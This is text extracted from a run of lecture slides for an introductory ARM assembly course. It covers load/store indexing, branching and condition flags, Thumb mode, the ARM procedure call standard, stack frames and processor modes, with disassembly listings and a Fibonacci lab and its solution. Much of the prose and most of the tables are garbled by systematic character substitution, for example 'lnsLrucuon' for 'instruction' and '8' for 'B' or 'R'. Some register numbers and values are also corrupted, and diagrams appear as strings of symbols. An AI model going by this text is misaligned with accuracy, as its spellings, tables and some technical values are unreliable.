839e: f107 0304 add.w r3, r7, #4
83a2: 60bb str r3, [r7, #8]
83a4: 68bb ldr r3, [r7, #8]
83a6: 681b ldr r3, [r3, #0]
83a8: f103 0302 add.w r3, r3, #2
83ac: 60fb str r3, [r7, #12]
83ae: f248 4330 movw r3, #33840 ; 0x8430
83b2: f2c0 0300 movt r3, #0
83b6: 4618 mov r0, r3
83b8: 68b9 ldr r1, [r7, #8]
83ba: f7ff ef92 blx 82e0 <_init+0x20>
83be: f248 434c movw r3, #33868 ; 0x844c
83c2: f2c0 0300 movt r3, #0
83c6: 4618 mov r0, r3
83c8: 68f9 ldr r1, [r7, #12]
83ca: f7ff ef8a blx 82e0 <_init+0x20>
83ce: f04f 0300 mov.w r3, #0
83d2: 4618 mov r0, r3
83d4: f107 0710 add.w r7, r7, #16
83d8: 46bd mov sp, r7
83da: bd80 pop {r7, pc}
int main(void)
{
int a, b;
int *x;
a = 8;
b = 9;

x = &a;
b = *x + 2;
printf("The address of a is 0x%x\n",x);
printf("The value of b is now %d\n",b);
return 0;
}
70
Memory operauons arL l conLd.
87 ln Lhe prevlous example ls known as :19.
1<<).99 ).?,9-.), where Lhe base address
reglsLer can by any one of 80-812, S, or L8
We wlll cover consecuuve muluple loads ln
one lnsLrucuon laLer
71
ConLrol llow operauons (1able A4-1)
J59-)/*>75 !.9*),8>75 (+/2: 27<.
)15?.
"'K 27<.
)15?.
8 <label> 8ranch Lo LargeL address +/- 16 M8 +/- 32 M8
8L, 8Lx <lmm> Call a subrouune
Call a subrouune, change lnsLrucuon seL
+/- 16 M8 +/- 32 M8
8Lx <reg> Call a subrouune, !"#!$%&&' change
lnsLrucuon seL
Any Any
8x 8ranch Lo LargeL address, change
lnsLrucuon seL
Any Any
C8Z Compare and 8ranch on Zero 0-126 byLes uoes noL exlsL
C8nZ Compare and 8ranch on nonzero 0-126 byLes uoes noL exlsL
188 1able 8ranch (byLe oseLs) 0-310 byLes uoes noL exlsL
18P 1able 8ranch (halfword oseLs) 0-131070
byLes
uoes noL exlsL
72
Condluonal 8ranchlng
8LL: 8ranch lf less Lhan or equal
Z=1 C8 n=v
8C1: 8ranch lf greaLer Lhan
Z=0 Anu n=v
8LC: 8ranch lf equal
Z=1
8nL: 8ranch lf noL equal
Z=0
Pow do n and v ags Lell us lf someLhlng ls less or greaLer
Lhan?
Cenerally Lhere ls a CM or 1S1 lnsLrucuon before
CM <r0> <r1> means perform <r0> - <r1>
73
Lxample 9.s
0000835c <__libc_csu_init>:
835c: e92d 43f8 stmdb sp!, {r3, r4, r5, r6, r7, r8, r9, lr}
8360: 4606 mov r6, r0
8362: f8df 9034 ldr.w r9, [pc, #52] ; 8398 <__libc_csu_init+0x3c>
8366: 460f mov r7, r1
8368: 4d0c ldr r5, [pc, #48] ; (839c <__libc_csu_init+0x40>)
836a: 4690 mov r8, r2
836c: 44f9 add r9, pc
836e: f7ff ff91 bl 8294 <_init>
8372: 447d add r5, pc
8374: ebc5 0909 rsb r9, r5, r9
8378: ea5f 09a9 movs.w r9, r9, asr #2
837c: d009 beq.n 8392 <__libc_csu_init+0x36>
837e: 2400 movs r4, #0
8380: f855 3b04 ldr.w r3, [r5], #4
8384: 4630 mov r0, r6
8386: 4639 mov r1, r7
8388: 4642 mov r2, r8
838a: 3401 adds r4, #1
838c: 4798 blx r3
838e: 454c cmp r4, r9
8390: d1f6 bne.n 8380 <__libc_csu_init+0x24>
8392: e8bd 83f8 ldmia.w sp!, {r3, r4, r5, r6, r7, r8, r9, pc}
8396: bf00 nop
8398: 00008ba0 .word 0x00008ba0
839c: 00008b96 .word 0x00008b96
74
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

L
8

A
7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
73
Pello, World ln A8M Assembly
.text
_start: .global _start

@ sys_write ( fd, pstr, len )
@ r7=4 r0 r1 r2
mov r0, #1 @ fd <- stdout
adr r1, msg @ pstr <- *msg
mov r2, #14 @ len <- 14
mov r7, #4 @ syscall <- sys_write
swi 0 @ system call
@ sys_exit ( exitcode )
@ r7=1 r0
mov r0, #0 @ exitcode <- 0
mov r7, #1 @ syscall <- sys_exit
swi 0 @ system call
msg:
.asciz "Hello, world!\n"
.end
Llnux CnuLA8l spec means syscall
ldenuer ls puL ln 87 and argumenLs
ln 80-86

Llnux kernel lgnores lmm value aer
SWl lnsLrucuon

Syscall lnvoked wlLh SWl/SvC
lnsLrucuon (supervlsor mode)
Source: hup://peLerdn.com/posL/e28098Pello-Worlde28099-ln-A8M-assembly.aspx
76
lnsLrucuons covered so far.
nC
Auu, AuC, Su8, S8C, 8S8, 8SC
AS8, LSL, LS8, 8C8, 88x
MCv, Mvn
8Lv, 8LvSP, 8Lv16
Anu, LC8, C88, C8n, CM, CMn
8lC, 1LC, 1S1
8, 8L, 8Lx, 8LL, 8C1
SWl
77
PlnLs on how Lo 81lM
S - updaLes ags ln Lhe CS8
<c> - allows mnemonlc of condluonal Lo be added
<q> - lnsLrucuon sux wlLh elLher:
.n narrow, assembler musL use 16-blL encodlng for
Lhe lnLrucuon
.W Wlde, assembler musL use 32-blL encodlng for Lhe
lnsLrucuon
uo noL use Lhe .n or .W ln your assembly code.
As per manual, lL wlll Lhrow errors. Assembler decldes
on encodlng dependlng on opuons selecLed.
78
Lab 1
Agaln commands glven below for copylng les
lnLo and ouL of Lhe slmulaLor
scp P 2200 <localfile> root@localhost:/path/to/file
scp P 2200 root@localhost:/path/to/file <localfile>
Password is passw0rd
llbonaccl program
WrlLe assembly funcuon Lo calculaLe bonaccl value
aL a glven posluon x
80 has x
lor example: [0, 1, 2, 3, 4, 3, 6 .] x
[0, 1, 1, 2, 3, 3, 8 .] bonaccl(x)
Cnly modlfy b.s
79
Sample algorlLhms
// Non-recursive
int fibonacci(int x) {
int previous = -1;
int result = 1;
int i=0;
int sum=0;
for (i = 0; i <= x; i++) {
sum = result + previous;
previous = result;
result = sum;
}
return result;
}
// Recursive
int fibonacci(int x) {
if(x<=0) return 0;
if(x==1) return 1;
return fibN(x-1) + fibN(x-2);
}
nC1L: llller code follows 8ecurslve
algorlLhm.
80
osslble soluuon
fibonacci:
push {r3, r4, r5, lr} ; function prolog
subs r4, r0, #0 ; r4 = r0 - 0
ble .L3 ; if (r0 <= 0) goto .L3

cmp r4, #1 ; Compare r4 to 1
beq .L4 ; if (r4 == 1) goto .L4

add r0, r4, #4294967295 ; r0 = r4 + 4294967295 (or #0xFFFFFFFF)
bl fibonacci ; goto fibonacci @PC relative address

mov r5, r0 ; r5 = r0
sub r0, r4, #2 ; r0 = r4 - 2
bl fibonacci ; goto fibonacci @PC relative address

adds r0, r5, r0
pop {r3, r4, r5, pc}
.L3:
mov r0, #0
pop {r3, r4, r5, pc}
.L4:
mov r0, #1
pop {r3, r4, r5, pc}

!"# % &"'( C
82
Ah Lhe old [oke.
Source: hup://xkcd.com/138/
83
Memory operauons arL l remlnder.
Lu8 r0, [r1]
81 ln Lhls example ls known as :19. 1<<).99
).?,9-.), where Lhe base address reglsLer can
be any one of 80-812, S, or L8
84
Memory Cperauons arL ll: lndexlng
operauons
relndex wlLh WrlLeback (denoLed by [8n,oseL])
CalculaLes address ln base reglsLer + oseL
uses calculaLed address for operauon lnLo 8n
SLores Lhe calculaLed address lnLo base reglsLer
relndex (denoLed by [8n,oseL])
CalculaLes address ln base reglsLer + oseL
uses calculaLed address for operauon lnLo 8n
uoes nC1 sLore Lhe calculaLed address lnLo base reglsLer
osundex (denoLed by [8L])
uses address ln base reglsLer for operauon lnLo 8n
CalculaLes address ln base reglsLer + oseL
SLores Lhe calculaLed address lnLo base reglsLer
83
Lu8 lndexlng
J5<.6,5? 27<. J59-)/*>75 'F '% 7) ':19.
relndex wlLh
WrlLeback
Lu8 r0, Lr1, 2MN r0 = [r1 + 2] r1 = r1 + 2
Lu8 r0, Lr1, r2MN r0 = [r1 + r2] r1 = r1 + r2
Lu8 r0, Lr1, r2, LSL 3MN r0 = [r1 + (r2 LSL 3)] r1 = r1 + (r2 LSL 3)
relndex Lu8 r0, Lr1, 2M r0 = [r1 + 2] r1 = r1
Lu8 r0, Lr1, r2M r0 = [r1 + r2] r1 = r1
Lu8 r0, Lr1, r2, LSL 3M r0 = [r1 + (r2 LSL 3)] r1 = r1
osundex Lu8 r0, Lr1M, 2 r0 = [r1] r1 = r1 + 2
Lu8 r0, Lr1M, r2 r0 = [r1] r1 = r1 + r2
Lu8 r0, Lr1M, r2, LSL 3 r0 = [r1] r1 = r1 + (r2 LSL 3)
lnsLrucuon form: Lu8<c> <8L>, [<8n>, oseL] where [] denoLes memory conLenLs of
Source: hup://www.slldeshare.neL/guesL36d1b781/arm-fundamenLals
86
S18 lndexlng
J5<.6,5? 27<. J59-)/*>75 '- '5 7) ':19.
relndex wlLh
WrlLeback
S18 r0, Lr1, 2MN [r1 + 2] = r0 r1 = r1 + 2
S18 r0, Lr1, r2MN [r1 + r2] = r0 r1 = r1 + r2
S18 r0, Lr1, r2, LSL 3MN [r1 + (r2 LSL 3)] = r0 r1 = r1 + (r2 LSL 3)
relndex S18 r0, Lr1, 2M [r1 + 2] = r0 r1 = r1
S18 r0, Lr1, r2M [r1 + r2] = r0 r1 = r1
S18 r0, Lr1, r2, LSL 3M [r1 + (r2 LSL 3)] = r0 r1 = r1
osundex S18 r0, Lr1M, 2 [r1] = r0 r1 = r1 + 2
S18 r0, Lr1M, r2 [r1] = r0 r1 = r1 + r2
S18 r0, Lr1M, r2, LSL 3 [r1] = r0 r1 = r1 + (r2 LSL 3)
lnsLrucuon form: S18<c> <8L>, [<8n>, oseL] where [] denoLes memory conLenLs of
Source: hup://www.slldeshare.neL/guesL36d1b781/arm-fundamenLals
87
Lxample 10 (Any program)
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: f248 4108 movw r1, #33800 ; 0x8408
8320: f247 6201 movw r2, #30209 ; 0x7601
8324: f2c0 0100 movt r1, #0
8328: f2c2 7297 movt r2, #10135 ; 0x2797
832c: f7ff efe8 blx 8300 <_init+0x3c>
8330: 2000 movs r0, #0
8332: bd08 pop {r3, pc}

00008334 <_start>:
8334: f04f 0b00 mov.w fp, #0
8338: f04f 0e00 mov.w lr, #0
833c: f85d 1b04 ldr.w r1, [sp], #4
8340: 466a mov r2, sp
8342: f84d 2d04 str.w r2, [sp, #-4]!
8346: f84d 0d04 str.w r0, [sp, #-4]!
834a: f8df c014 ldr.w ip, [pc, #20] ;
8360 <_start+0x2c>
834e: f84d cd04 str.w ip, [sp, #-4]!
8352: 4804 ldr r0, [pc, #16] ;
(8364 <_start+0x30>)
8354: 4b04 ldr r3, [pc, #16] ;
(8368 <_start+0x34>)
8356: f7ff efc6 blx 82e4 <_init+0x20>
835a: f7ff efd8 blx 830c <_init+0x48>
835e: 0000 .short 0x0000
8360: 000083f9 .word 0x000083f9
8364: 00008319 .word 0x00008319
8368: 000083b5 .word 0x000083b5


88
A noLe on Lu8/S18
lor loadlng large consLanLs lnLo reglsLers, Lhe
assembler generally prefers uslng MCvn
<8d>, <~large consLanL> (~ ls 8lLwlse nC1)
Assembler llkes Lo use values beLween 0 and
233 along wlLh barrel shls Lo arrlve aL value
Lxample:
lnsLead of:
LDR R0, #ffffff23
MOVN R0, #0xDC

89
CLher lnsLrucuons
SSA1 <reg1> <lmm> <reg2> - Slgned SaLuraLe
uSA1 <reg1> <lmm> <reg2> - unslgned SaLuraLe
CAuu <reg1> <reg2> <reg3> - Add & saLuraLe
Lhe resulL (<reg1> = saL(<reg2> + <reg3>)
CSu8 -SubLracL & saLuraLe Lhe resulL
<reg1> = saL(<reg2> - <reg3>)
CuAuu - SaLuraLe uouble & Add <reg1>=saL
(<reg2> + 2<reg3>)
CuSu8 - <reg1> = saL(<reg2> - 2<reg3>)
90
ConLrol llow operauons (1able A4-1)
J59-)/*>75 !.9*),8>75 (+/2: 27<.
)15?.
"'K 27<.
)15?.
8 <label> 8ranch Lo LargeL address +/- 16 M8 +/- 32 M8
8L, 8Lx <lmm> Call a subrouune
Call a subrouune, change lnsLrucuon seL
+/- 16 M8 +/- 32 M8
8Lx <reg> Call a subrouune, !"#!$%&&' change
lnsLrucuon seL
Any Any
8x 8ranch Lo LargeL address, change
lnsLrucuon seL
Any Any
C8Z Compare and 8ranch on Zero (16-blL)
ermlued oseLs are even from 0 - 126
+4 Lo +130
byLes
uoes noL exlsL
C8nZ Compare and 8ranch on nonzero (16-blL)
ermlued oseLs are even from 0 - 126
+4 Lo +130
byLes
uoes noL exlsL
188 1able 8ranch (byLe oseLs) (32-blL) 0-310 byLes uoes noL exlsL
18P 1able 8ranch (halfword oseLs) (32-blL) 0-131070
byLes
uoes noL exlsL
91
Condluonal execuuon
MosL lnsLrucuons can be made condluonal by
addlng Lwo leuer mnemonlc from Lable A8-1
Lo end of an exlsung lnsLrucuon
lL lncreases performance by reduclng Lhe of
branches
Lxample:
AuuLC r0, r1, r2 lf zero ag ls seL Lhen r0=r1+r2
92
Condluonal operauons (1able A8-1)
O/P6 !.9*),8>75 031?9 -.9-.<
LC Lqual Z=1
nL noL Lqual Z=0
CS/PC unslgned hlgher or same C=1
CC/LC unslgned lower C=0
Ml Mlnus n=1
L osluve or Zero n=0
vS Cverow v=1
vC no overow v=0
Pl unslgned Plgher C=1 Anu Z=0
LS unslgned lower or same C=0 C8 Z=1
CL CreaLer or equal n=v
L1 Less Lhan n=v
C1 CreaLer Lhan Z=0 Anu n=v
LL Less Lhan or equal Z=1 C8 n=v
AL Always
93
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

L
8

A
7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
94
lpellnlng
uoes noL decrease lnsLrucuon execuuon ume
lncreases LhroughpuL
1lme allocaLed dependenL on longesL cycle
lnsLrucuon
leLches and decodes lnsLrucuons ln parallel
whlle execuung currenL lnsLrucuon.
Source:
hup://www-cs-faculLy.sLanford.edu/~eroberLs/courses/soco/pro[ecLs/2000-01/rlsc/plpellnlng/
lndex.hLml

Also see hup://www.cse.unsw.edu.au/~cs9244/06/semlnars/08-leonldr.pdf
93
lpellnlng ln acuon
Source: hup://web.eecs.umlch.edu/~prabal/Leachlng/eecs373-f10/readlngs/A8MArchlLecLureCvervlew.pdf

96
lssues assoclaLed wlLh plpellnlng
8ranch lnsLrucuons
Condluonal execuuon reduces number of
branches, whlch reduces of plpellne ushes
lnsLrucuons dependenL on prevlous
lnsLrucuons (daLa-dependency)
lnLerrupLs ln Lhe beglnnlng/mlddle/end of
cycle?
Pow code ls opumlzed for plpellnlng ls
compller & processor dependenL
Source: hup://bnrg.eecs.berkeley.edu/~randy/Courses/CS232.S96/LecLure08.pdf
97
CLher ways of branchlng
Lu8 C, [C, oseL]
value wrluen has Lo be allgned for mode
Larller processors (armv4 and earller) used Lo
have prefeLch
C polnLs Lwo lnsLrucuons ahead
rogrammer has Lo accounL for C+8
SLore address of branch locauon aL currenL address +
oseL + 8
Same Lradluon conunues for all arm archlLecLures
so far
Source: hup://en.wlklpedla.org/wlkl/LlsLofA8Mmlcroprocessorcores
98
Lxample 12.s
0x10000000 add r0, r1, r2
0x10000004 ldr pc, [pc, #4]
0x10000008 sub r1, r2, r3
0x1000000c cmp r0, r1
0x10000010 0x20000000
!
Branch target
0x20000000 str r5, [r13, -#4]!
99
CnL lnsLrucuon Lo rule Lhem all..
LuM/S1M - Load muluple/SLore muluple
used ln con[uncuon wlLh a sux (called
mode) for how Lo move consecuuvely
LowesL reglsLer uses Lhe lowesL memory
address
100
LuM/S1M modes
K7<. O+7)- <.9*),8>75 Q!K
9457542
O(K
9457542
O-1)-
"<<).99
R5<
"<<).99

'5N
lA lncremenL Aer =0, u=1 =0, u=1 8n 8n
+4n-4
8n+4n
l8 lncremenL 8efore =1, u=1 =1, u=1 8n+4 8n+4n 8n+4n
uA uecremenL aer =0, u=0 =0, u=0 8n-4n
+4
8n 8n-4n
u8 uecremenL before =1, u=0 =1, u=0 8n-4n 8n-4 8n-4n
lA lull Ascendlng uA l8
LA LmpLy Ascendlng u8 lA
lu lull uescendlng lA u8
Lu LmpLy uescendlng l8 uA
n ls Lhe number of reglsLers
n goes from 1..n
101
SLack operauons
lnsLead of C, we use Load-Muluple
lnsLead of uSP, we use SLore-Muluple
SLacks can be
(A)scendlng - sLack grows Lo hlgher memory
addresses
(u)escendlng - sLack grows Lo lower memory
addresses
102
LuM/S1M palrs
O-7). K/3>83. Q71< K/3>83.
S1MlA LuMu8
S1Ml8 LuMuA
S1MuA LuMl8
S1Mu8 LuMlA
103
S1Mu8 operauon
87 0xl00u0000
0x00008018 S
0x8000
0x8004
0x8008
lnS18uC1lCn: S1Mu8 sp, r3, r4, r3, r7
0x800C
0x8010
0x8014
0x8018
83 0xlLLu0000
84 0x0000CAlL
83 0xA8CuuLll
0xA8CuuLll
S 0x00008008
0x0000CAlL
0xlLLu0000
0xl00u0000
104
LuMlA operauon
87 0xl00u0000
0x00008018 S
0x8000
0x8004
0x8008
lnS18uC1lCn: LuMlA sp, r3, r4, r3, r7
0x800C
0x8010
0x8014
0x8018
83 0xlLLu0000
84 0x0000CAlL
83 0xA8CuuLll
0xA8CuuLll
S 0x00008008
0x0000CAlL
0xlLLu0000
0xl00u0000
103
Lxample 13.s
0000835c <__libc_csu_init>:
835c: e92d 43f8 stmdb sp!, {r3, r4, r5, r6, r7, r8, r9, lr}
8360: 4606 mov r6, r0
8362: f8df 9034 ldr.w r9, [pc, #52] ; 8398 <__libc_csu_init+0x3c>
8366: 460f mov r7, r1
8368: 4d0c ldr r5, [pc, #48] ; (839c <__libc_csu_init+0x40>)
836a: 4690 mov r8, r2
836c: 44f9 add r9, pc
836e: f7ff ff91 bl 8294 <_init>
8372: 447d add r5, pc
8374: ebc5 0909 rsb r9, r5, r9
8378: ea5f 09a9 movs.w r9, r9, asr #2
837c: d009 beq.n 8392 <__libc_csu_init+0x36>
837e: 2400 movs r4, #0
8380: f855 3b04 ldr.w r3, [r5], #4
8384: 4630 mov r0, r6
8386: 4639 mov r1, r7
8388: 4642 mov r2, r8
838a: 3401 adds r4, #1
838c: 4798 blx r3
838e: 454c cmp r4, r9
8390: d1f6 bne.n 8380 <__libc_csu_init+0x24>
8392: e8bd 83f8 ldmia.w sp!, {r3, r4, r5, r6, r7, r8, r9, pc}
8396: bf00 nop
8398: 00008ba0 .word 0x00008ba0
839c: 00008b96 .word 0x00008b96
106
SwlLchlng beLween A8M and 1humb
sLaLes
A processor ln 1humb can enLer A8M sLaLe by
execuung any of Lhe followlng:
8x, 8Lx, or Lu8/LuM operauon on C (813)
A processor ln A8M can enLer 1humb sLaLe by
execuung any of Lhe followlng:
AuC, Auu, Anu, AS8, 8lC, LC8, LSL, LS8, MCv,
Mvn, C88, 8C8, 88x, 8S8, 8SC, S8C, or Su8
operauon on C (813) and whlch does noL seL Lhe
condluon ags.
107
1humb2 lnsLrucuon seL means .
1he lnsLrucuons ln 1humb2 lLself are a mlx of 16-blL and 32-
blL lnsLrucuons and are run ln 1humb-mode
Compller opuon Lo mlx A8M-mode and 1humb-mode
lnsLrucuons: -m-Lhumb-lnLerwork
uefaulL ls -mno-Lhumb-lnLerwork
1he xeno Cuesuon - So how can we Lell Lhe dlerence?
Menuoned ln Lhe A1CS manual (lncluded ln Lhe
references)
1he LS8 (rlghLmosL blL) of branch address has Lo be 1 lf Lhe
lnsLrucuons aL LhaL address are Lo be lnLerpreLed as
1humb2
lf you wanL Lo [ump Lo address conLalnlng a mlx of 16-blL
and 32-blL lnsLrucuons make sure Lhe address ls odd.
108
Pow does 1humb mode dlerenuaLe
b/w 16-blL and 32-blL lnsLrucuons?
ln 1humb mode A8M processor only reads
halfword-allgned halfwords
Looks aL lnsLrucuon encodlng:
lf blLs 13:11 of Lhe halfword belng decoded ls one
of followlng, Lhen lL ls Lhe rsL halfword of a 32 blL
lnsLrucuon
0b11101
0b11110
0b11111
CLherwlse, lL ls lnLerpreLed as 16-blL lnsLrucuon
109
A8M-1humb rocedure Call SLandard
lollowed by compllers
Caller saved reglsLers:
1he caller subrouune musL preserve Lhe conLenLs of
80 - 83 lf lL needs Lhem before calllng anoLher
subrouune
Callee saved reglsLers:
1he called subrouune musL preserve Lhe conLenLs of
84 - 811 (usually on Lhe sLack ln memory) and musL
resLore Lhe values before reLurnlng (lf used).
WhaL abouL lnLerrupLs?
110
A1CS
'.?,9-.) O457542 O8.*,13 '73. ,5 -+. 8)7*.</). *133 9-15<1)<
r13 C 1he rogram CounLer. (x86 Ll)
r14 L8 1he Llnk 8eglsLer. (x86 saved Ll)
r13 S 1he SLack olnLer. (x86 LS)
r12 l 1he lnLra-rocedure-call scraLch reglsLer. (x86 8Sl)
r11 v8 varlable-reglsLer 8/lrame olnLer (x86 L8)
r10 v7 varlable-reglsLer 7/SLack LlmlL
r9 v6/S8/18 lauorm speclc reglsLer.
r8 v3 varlable-reglsLer 3.
r7 v4 varlable-reglsLer 4. (can also be x86 L8)
r6 v3 varlable-reglsLer 3.
r3 v2 varlable-reglsLer 2.
r4 v1 varlable-reglsLer 1.
r3 a4 ArgumenL/scraLch reglsLer 4.
r2 a3 ArgumenL/scraLch reglsLer 3.
r1 a2 ArgumenL/resulL/scraLch reglsLer 2.
r0 a1 ArgumenL/resulL/scraLch reglsLer 1.
111
A1CS
r0
r1
r2
r3
r4
r3
r6
r7
r8
r9
810 (SL)
r11 (l)
r12 (l)
r13 (S)
r14 (L8)
CS8
r13 (C)
Caller saved
Callee saved
SLack olnLer should be same upon Callee reLurn as lL was
upon Callee enLry. So should Lhe Llnk 8eglsLer
l ls nelLher mandaLed nor precluded from use. lf lL ls
used, lL musL be Callee saved. ln A8M sLaLe, 811 ls used. ln
1humb sLaLe, 84-87 can be used.
112
A1CS ln acuon
int main(void)
{
one();
return 0;
}

void one(void)
{
zero();
two();
return;
}

void two(void)
{
printf("main...one...two\n");
return;
}

void zero(void)
{
return;
}
int main(void)
{
r0-r3 saved.
call to one() made.
}

void one(void)
{
r4-r11 saved.
lr saved
fp saved to point to one above lr in stack
// use r0-r3 as arguments
two();
r4-r11, lr restored
bx lr (branches to lr)
}


113
So, how does Lhls sLack up? (pun
lnLended)
.
maln() frame"
undened
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
114
8ranch wlLh Llnk occurs Lo one()
.
maln() frame"
undened
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
rocessor coples C lnLo L8
SeLs C = one() ln memory
113
A8M now execuung rsL lnsLrucuon ln
one()
.
maln() frame"
Cne() frame"
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Callee-save reglsLers are pushed
onLo sLack uslng S1Mlu sp,
reglsLers along wlLh 814 (L8)

"5< '%%S'TS'BU0&V *15 1397 :.
/8<1-.< ).31>W. -7 U'%BVO&
Callee-save reglsLers
L8 = Cmaln
116
A8M now execuung second
lnsLrucuon ln one()
.
maln() frame"
Cne() frame"
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Local varlables are also added Lo Lhe
sLack
Callee-save reglsLers
Local varlables
L8 = Cmaln
117
C now abouL Lo branch Lo Lwo()
.
maln() frame"
Cne() frame"
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Caller-save reglsLers for one() are saved.
ArgumenLs Lo Lwo are also pushed
Callee-save reglsLers
Local varlables
L8 = Cmaln
Caller-save reglsLers
Args Lo 1wo()
118
8ranch wlLh Llnk occurs Lo Lwo()
.
maln() frame"
Cne() frame"
1wo() frame"
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Callee-save reglsLers
Local varlables
L8 = Cmaln
Caller-save reglsLers
Args Lo 1wo()
rocessor coples C lnLo L8
SeLs C = one() ln memory
119
A8M now execuLes rsL lnsLrucuon ln
Lwo()
.
maln() frame"
Cne() frame"
1wo() frame"
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Callee-save reglsLers
Local varlables
L8 = Cmaln()
Caller-save reglsLers
Args Lo 1wo()
Saves Lhe callee-save reglsLers
Also saves Lhe 814(Llnk 8eglsLer)
Callee-save reglsLers
L8 = CCne()
120
So, how dld lL sLack up?
Slmllar Lo x86 ln some ways.
Powever, 811(l) ls noL really used much.
S ls updaLed uslng S1Mlu and LuMlu
uesplLe Lhe reLurn address belng saved ln Lhe
L8, mosL oen lL ls puL on Lhe sLack and Lhen
resLored laLer dlrecLly lnLo C
Whlch may help you ln Lab 3.
121
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

L
8

A
7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
XK7<. LYZFM K7<.
10000 user
10001 llC
10010 l8C
10011 SvC (Supervlsor)
10111 AborL
11011 undened
11111 SysLem
122
Cenerlc A8M Modes
user: normal program execuuon mode
llC: used for handllng a hlgh prlorlLy (fasL) lnLerrupL
l8C: used for handllng a low prlorlLy (normal) lnLerrupL
Supervlsor: enLered on board reseL and when a
Soware lnLerrupL lnsLrucuon ls execuLed
AborL: used for handllng memory access vlolauons
SysLem: a prlvlleged mode uslng same reglsLers as user
mode
123
8anked 8eglsLers
r0
r1
r2
r3
r4
r3
r6
r7
r8
r9
r10
r11 (l)
r12 (l)
r13 (S)
r14 (L8)
CS8
r13 (C)
r8
r9
r10
r11
r12
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
8anked reglsLers are preserved across mode changes.
124
Arm rocessor modes
user: normal program execuuon mode
llC: used for handllng a hlgh prlorlLy (fasL) lnLerrupL
l8C: used for handllng a low prlorlLy (normal) lnLerrupL
Supervlsor: enLered on reseL and when SWl (soware lnLerrupL
lnsLrucuon) ls execuLed
AborL: used for handllng memory access vlolauons
undened: used for handllng undened lnsLrucuons
SysLem: a prlvlleged mode LhaL uses Lhe same reglsLers as Lhe
user mode
123
A8Mv7 rocessor modes (1able 81-1)
&)7*.997)
27<.
R5*7<,5? &),W,3.?.
Q.W.3
J283.2.5-.< O.*/),-4 O-1-. J59-)/*>75SD75<,>75
U,[ 1W1,31:3.V
user usr 10000 L0 Always 8oLh
llC q 10001 L1 Always 8oLh ln1L88u1
l8C lrq 10010 L1 Always 8oLh ln1L88u1
Supervlsor svc 10011 L1 Always 8oLh SvC/SWl
MonlLor mon 10110 L1 SecurlLy
LxLenslons
(1rusLZone)
Secure only SMC/Secure MonlLor
Call LxCL1lCn
AborL abL 10111 L1 Always 8oLh uaLa/refeLch AborL
LxCL1lCn
Pyp hyp 11010 L2 vlrLuallzauon
LxLenslons
non-secure
only
PvC/LxCL1lCn
undened und 11011 L1 Always 8oLh unuLllnLu
SysLem sys 11111 L1 Always 8oLh
126
Mode changlng lnsLrucuons
SvC - Supervlsor Call or SWl - SoWare
lnLerrupL
Changes mode Lo Supervlsor mode
SMC - Secure MonlLor Call
Changes mode Lo Secure (wlLh 1rusLZone)
PvC - Pypervlsor Call
Changes mode supervlsor (wlLh hardware
vlrLuallzauon exLensuons)
127
SwlLchlng modes
Speclc lnsLrucuons for swlLchlng beLween
processor modes (SvC/SWl eLc.)
PvC (Pypervlsor call) only avallable wlLh speclc
hardware supporL
SMC (Secure MonlLor call) also only avallable only
wlLh speclc hardware supporL (1rusLZone)
MCvS C, L8 (coples SS8 Lo CS8/AS8)
Llnux kernel and oLher 81CS (rlch feaLured" CS)
run ln Supervlsor mode generally
8emember Lhe SWl from Pello World?
128
Speclal lnsLrucuons
Su8S C, L8, <lmm>
SubLracLs <lmm> value from L8 and branches Lo
resulung address
lL also coples SS8 Lo CS8
MCvS C, L8
Same as above buL branches Lo address ln L8 and
also coples SS8 Lo CS8
lor use ln reLurnlng Lo user/SysLem mode
from excepuon/lnLerrupL modes
129
Pow Lo read/wrlLe SLaLus reglsLers
CS8 and AS8 value can be saved lnLo
reglsLer
MS8 - Move Lo Speclal reglsLer from A8M
core reglsLer
Lxample: msr <cpsr/apsr> <r0>
M8S - Move Lo A8M core 8egslLer from
speclal reglsLer
Lxample: mrs <r0> <cpsr/apsr>
130
SC1L8 8eglsLer
SysLem ConLrol 8eglsLer: parL of Coprocessor
C13 reglsLers
